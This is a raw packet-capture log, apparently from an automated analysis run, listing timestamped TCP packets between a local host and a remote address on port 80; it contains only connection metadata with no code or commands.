                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732151031 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732156992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732162952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732337952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732348919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732359886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732362986 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732368946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732379913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732389927 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732391119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732402086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732405901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732413054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732424021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732434988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732439995 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732456923 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732460976 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732472897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732482910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732490063 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732494116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732512951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732525110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732536077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732547998 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732558966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732573032 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732582092 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732609987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732613087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732625008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732640028 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732723951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732733011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732743025 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732745886 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732760906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732767105 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732772112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732783079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732794046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732811928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732829094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732834101 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732848883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732852936 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732975960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732988119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732999086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733002901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733011007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733022928 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733108044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733119011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733129978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733130932 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733140945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733206034 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733206034 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733421087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733433962 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733444929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733455896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733467102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733478069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733479977 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733489037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733500004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733510017 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733515978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733522892 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733529091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733539104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733544111 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733550072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733560085 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733571053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733582973 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733587027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733597994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733606100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733609915 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733617067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733627081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733639002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733649969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733659983 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733660936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733671904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733683109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733695984 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733695984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733706951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733716011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733724117 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733724117 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733733892 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733752012 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733755112 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733763933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733774900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733777046 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733786106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733797073 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733804941 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733807087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733819008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733829021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733839035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733844995 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733850002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733860970 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733870029 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733871937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733881950 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733882904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733892918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733902931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733916998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733920097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733936071 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733944893 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733947039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733958960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733961105 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733975887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733987093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733997107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.733997107 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734008074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734011889 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734018087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734028101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734049082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734097958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734113932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734122038 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734124899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734136105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734141111 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734148026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734155893 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734158993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734170914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734180927 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734191895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734196901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734196901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734203100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734214067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734268904 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734268904 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734483004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734502077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734507084 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734519005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734529018 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734539986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734549999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734560966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734563112 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734572887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734584093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734582901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734595060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734606981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734616995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734627962 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734628916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734641075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734642982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734652042 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734663010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734663963 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734673977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734683990 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734684944 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734695911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734707117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734707117 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734718084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734718084 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734730005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734740973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734750986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734754086 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734792948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.734792948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735338926 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735338926 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735338926 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735770941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735784054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735795975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735822916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735835075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735887051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735898018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735908985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735984087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.735995054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736005068 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736015081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736026049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736037016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736881018 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736881018 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736881018 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736881018 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736881018 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736881018 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.736881018 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.738425970 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.738470078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.738534927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.738544941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.738785982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.739243031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.743516922 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.746725082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.746758938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.746768951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.746779919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.746869087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.746881008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.747339010 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.747592926 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.748074055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.748085976 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.748095989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.751338959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753890038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753911018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753921986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753932953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753945112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753954887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753966093 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753977060 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.753988028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754038095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754050016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754065990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754076958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754087925 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754098892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754110098 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754120111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754129887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754139900 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754151106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754162073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754173040 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754184008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754199982 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754213095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754224062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754235029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754245996 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754256010 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754266977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754277945 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754287958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754298925 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754309893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754319906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754331112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754360914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754373074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754383087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754394054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754405022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754420996 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754431963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754441977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754453897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754452944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754452944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754452944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754452944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.754452944 CET4995780192.168.2.10147.45.47.81
